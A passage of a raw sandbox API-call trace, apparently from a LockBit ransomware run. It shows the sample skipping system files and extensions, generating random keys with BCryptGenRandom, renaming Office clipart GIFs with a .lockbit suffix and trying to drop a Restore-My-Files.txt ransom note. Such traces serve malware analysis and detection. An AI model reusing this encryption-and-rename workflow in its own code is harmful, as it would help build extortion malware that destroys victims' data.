(lpString1=".", lpString2="WB01244_.GIF") returned -1 [0179.882] lstrcmpiW (lpString1="..", lpString2="WB01244_.GIF") returned -1 [0179.882] PathFindExtensionW (pszPath="WB01244_.GIF") returned=".GIF" [0179.882] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0179.882] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0179.882] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0179.882] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0179.882] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0179.882] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0179.882] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0179.882] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0179.882] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0179.882] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0179.882] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0179.882] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0179.882] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0179.882] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0179.882] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0179.882] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0179.882] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0179.882] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0179.882] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0179.882] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0179.883] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0179.883] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0179.883] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0179.883] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0179.883] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.883] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0179.883] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0179.883] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0179.883] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0179.883] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0179.883] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0179.883] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0179.883] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0179.883] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0179.883] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0179.883] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0179.883] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0179.883] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0179.883] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0179.883] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0179.883] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0179.883] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0179.883] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.884] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0179.884] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0179.884] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0179.884] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0179.884] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01244_.GIF") returned -1 [0179.884] lstrcmpiW (lpString1="ntldr", lpString2="WB01244_.GIF") returned -1 [0179.884] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01244_.GIF") returned -1 [0179.884] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01244_.GIF") returned -1 [0179.884] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01244_.GIF") returned -1 [0179.884] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01244_.GIF") returned -1 [0179.884] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01244_.GIF") returned -1 [0179.884] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.884] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01244_.GIF") returned=".GIF" [0179.884] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0179.884] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0179.884] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0179.884] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0179.884] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0179.884] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0179.884] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0179.884] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0179.884] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0179.884] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0179.884] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0179.885] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0179.885] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0179.885] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0179.885] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0179.885] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0179.885] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0179.885] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0179.885] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0179.885] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0179.885] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0179.885] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0179.885] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0179.885] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0179.885] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0179.885] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0179.885] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0179.885] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0179.885] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01244_.GIF.lockbit") returned 72 [0179.885] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01244_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01244_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0179.887] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.887] malloc (_Size=0x40068) returned 0x1ff1e60 [0179.887] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=467) returned 1 [0179.887] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.887] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0179.888] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.888] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0179.888] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0179.893] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01244_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01244_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.893] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.893] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0179.893] free (_Block=0x1fa2ed8) [0179.893] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01244_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.893] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.893] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.894] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x545ba000, ftCreationTime.dwHighDateTime=0x1bd4e6b, ftLastAccessTime.dwLowDateTime=0x70875130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x545ba000, ftLastWriteTime.dwHighDateTime=0x1bd4e6b, nFileSizeHigh=0x0, nFileSizeLow=0x155, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01245_.GIF", cAlternateFileName="")) returned 1 [0179.894] lstrcmpiW (lpString1=".", lpString2="WB01245_.GIF") returned -1 [0179.894] lstrcmpiW (lpString1="..", lpString2="WB01245_.GIF") returned -1 [0179.894] PathFindExtensionW (pszPath="WB01245_.GIF") returned=".GIF" [0179.894] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0179.894] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0179.894] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0179.894] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0179.894] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0179.894] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0179.894] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0179.894] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0179.894] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0179.894] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0179.894] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0179.894] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0179.894] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0179.894] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0179.894] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0179.894] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0179.894] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0179.894] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0179.894] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0179.894] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0179.894] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0179.895] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0179.895] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0179.895] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0179.895] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.895] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0179.895] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0179.895] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0179.895] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0179.895] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0179.895] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0179.895] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0179.895] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0179.895] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0179.895] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0179.895] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0179.895] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0179.895] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0179.895] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0179.895] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0179.895] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0179.895] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0179.895] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.895] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0179.895] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0179.895] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0179.895] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0179.895] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01245_.GIF") returned -1 [0179.896] lstrcmpiW (lpString1="ntldr", lpString2="WB01245_.GIF") returned -1 [0179.896] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01245_.GIF") returned -1 [0179.896] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01245_.GIF") returned -1 [0179.896] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01245_.GIF") returned -1 [0179.896] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01245_.GIF") returned -1 [0179.896] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01245_.GIF") returned -1 [0179.896] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.896] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01245_.GIF") returned=".GIF" [0179.896] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0179.896] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0179.896] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0179.896] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0179.896] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0179.896] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0179.896] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0179.896] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0179.896] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0179.896] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0179.896] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0179.896] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0179.896] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0179.896] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0179.896] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0179.896] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0179.896] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0179.896] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0179.897] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0179.897] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0179.897] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0179.897] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0179.897] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0179.897] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0179.897] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0179.897] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0179.897] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0179.897] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0179.897] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01245_.GIF.lockbit") returned 72 [0179.897] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01245_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01245_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0179.903] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.903] malloc (_Size=0x40068) returned 0x3df0008 [0179.903] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=341) returned 1 [0179.903] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.903] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0179.904] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.904] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0179.904] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0179.905] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01245_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01245_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.905] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.905] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.907] free (_Block=0x1fa2ed8) [0179.907] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01245_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.907] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.907] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.907] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x486fde00, ftCreationTime.dwHighDateTime=0x1bd4e6b, ftLastAccessTime.dwLowDateTime=0x70875130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x486fde00, ftLastWriteTime.dwHighDateTime=0x1bd4e6b, nFileSizeHigh=0x0, nFileSizeLow=0x1ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01246_.GIF", cAlternateFileName="")) returned 1 [0179.907] lstrcmpiW (lpString1=".", lpString2="WB01246_.GIF") returned -1 [0179.907] lstrcmpiW (lpString1="..", lpString2="WB01246_.GIF") returned -1 [0179.907] PathFindExtensionW (pszPath="WB01246_.GIF") returned=".GIF" [0179.907] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0179.907] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0179.908] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0179.908] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0179.908] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0179.908] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0179.908] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0179.908] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0179.908] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0179.908] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0179.908] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0179.908] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0179.908] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0179.908] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0179.908] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0179.908] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0179.908] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0179.908] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0179.908] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0179.908] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0179.908] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0179.908] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0179.908] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0179.908] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0179.908] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.909] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0179.909] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0179.909] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0179.909] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0179.909] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0179.909] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0179.909] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0179.909] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0179.909] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0179.909] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0179.909] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0179.909] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0179.909] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0179.909] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0179.909] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0179.909] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0179.909] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0179.909] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.909] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0179.909] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0179.909] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0179.909] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0179.909] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01246_.GIF") returned -1 [0179.909] lstrcmpiW (lpString1="ntldr", lpString2="WB01246_.GIF") returned -1 [0179.910] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01246_.GIF") returned -1 [0179.910] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01246_.GIF") returned -1 [0179.910] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01246_.GIF") returned -1 [0179.910] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01246_.GIF") returned -1 [0179.910] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01246_.GIF") returned -1 [0179.910] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.910] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01246_.GIF") returned=".GIF" [0179.910] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0179.910] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0179.910] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0179.910] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0179.910] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0179.910] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0179.910] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0179.910] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0179.910] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0179.910] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0179.910] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0179.910] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0179.910] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0179.910] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0179.910] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0179.910] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0179.911] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0179.911] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0179.911] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0179.911] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0179.911] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0179.911] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0179.911] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0179.911] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0179.911] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0179.911] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0179.911] lstrcmpiW 